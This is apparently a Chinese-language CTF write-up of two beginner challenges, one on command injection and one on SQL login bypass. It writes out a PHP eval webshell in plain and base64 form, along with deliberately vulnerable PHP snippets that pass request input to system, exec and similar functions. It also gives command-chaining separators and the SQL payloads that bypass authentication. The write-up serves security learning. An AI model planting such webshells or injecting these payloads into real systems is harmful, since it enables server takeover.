目录
0x01命令执行
[ACTF2020 新生赛]Exec1
1、解法1
2、解法2
3、总结
3.1php命令注入函数
3.2java命令注入函数
3.3常见管道符
0x02SQL注入
[极客大挑战 2019]EasySQL1
0x01命令执行
[ACTF2020 新生赛]Exec1
1、解法1
ping本地,有回显,TTL=42,应该是修改过的,无法根据此判断系统类型。
分别尝试window和Linux系统命令,判断类型。
查看本级目录
遍历目录,查看上级目录
查看上上级目录
查看上上上级目录(到顶了),发现flag文件名
读它
2、解法2
写入webshell,用蚁剑连接
直接写入 echo '<?php eval($_POST[1]); ?>' > 1.php base64编码写入 echo "PD9waHAgZXZhbCgkX1BPU1RbMV0pOyA/Pg==" | base64 -d >2.php
写入
验证
连接
3、总结
3.1php命令注入函数
exec() 、 shell_exec() 、 system() 、 popen() 、 passthru() 、 proc_open() 、 反引号``
exec:该函数无回显需使用 echo 进行输出,且只返回执行后的最后一行结果。
<?php $sys = $_REQUEST['value']; $cmd = exec($sys); echo $cmd; ?>
shell_exec():无回显需使用 echo 或者 var_dump 进行输出,但返回结果所有内容。
<?php $sys = $_REQUEST['value']; $cmd = shell_exec($sys); var_dump( $cmd); ?>
反引号`` :反引号其实调用的是shell_exec()函数,当反引号中的变量可控时就会造成命令执行,且无回显。
<?php $sys = $_REQUEST['value']; $cmd = `$sys`; echo $cmd; ?>
system():有回显且返回所有内容。最常见的命令执行方式。如果目标是LInux则执行 Bash 命令,如果是Windows则执行 cmd 命令。
//简单例子 <?php $sys = $_REQUEST['value']; $cmd = system($sys); ?>
在ACTF2020新生赛Exec1该题中,后端逻辑为:
<?php if (isset($_POST['target'])) { system("ping -c 3 ".$_POST['target']); } ?>
popen(comnand,mode):该函数通常用于打开进程文件指针,但如果传入的参数可控也可造成命令执行,且该函数无回显,通过echo 不回直接返回执行的结果,而是返回的是文件指针。
<?php $sys = $_REQUEST['value']; $cmd = popen($sys,'r'); var_dump($cmd); ; ?>
passthru():与 system() 类似,也可将输入的参数当做命令执行,且函数执行后有回显。
<?php $sys = $_REQUEST['value']; $cmd = passthru($sys); ?>
proc_open():执行一个命令,并且打开用来输入/输出的文件指针。 类似 popen() 函数,
3.2java命令注入函数
java.lang.Runtime、 ava.lang.ProcessBuilder、 java.lang.UNIXProcess/ProcessImpl
3.3常见管道符
windows
| 直接执行后面的语句 || 如果前面执行的语句出错,那么才执行后面的语句 & 前面和后面的语句都会被执行 && 前面语句出错后面的语句也不执行,只有前面的语句成功执行才执行后面的语句
linux
| 直接执行后面的语句 || 如果前面执行的语句出错,那么才执行后面的语句 & 前面和后面的语句都会被执行 && 前面语句出错后面的语句也不执行,只有前面的语句成功执行才执行后面的语句 ; 前面的语句执行完成后,继续执行后面的语句。(特有)
0x02SQL注入
[极客大挑战 2019]EasySQL1
发现是登录界面,根据题目描述的提示,判断是SQL注入
随意输入用户名和密码,用hackbar LoadURL
构造payload查看错误提示
/check.php?username=admin'aa--&password=1111
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'aa--' and password='1111'' at line 1
根据提示可以分析出的信息有:
1、数据库:MariaDB 2、SQL后端逻辑:username='$username' and password='$password'
既然是登录框,那肯定是要登录上去看看的
/check.php?username=admin' or 1=1 --+&password='--+
发现flag